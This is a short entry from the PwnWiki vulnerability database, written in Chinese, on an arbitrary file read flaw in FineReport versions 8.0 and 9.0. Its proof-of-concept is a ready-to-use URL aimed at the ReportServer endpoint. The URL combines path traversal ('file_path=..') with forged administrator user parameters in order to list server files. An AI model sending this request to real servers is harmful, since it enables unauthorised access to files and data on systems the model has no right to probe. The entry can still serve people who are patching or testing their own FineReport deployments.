Loading
0

FineReport v8.0 – 9.0 任意文件读取漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

漏洞影响

FineReport v8.0
FineReport v9.0

POC

http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true

免费、自由、人人可编辑的漏洞库--pwnwiki.com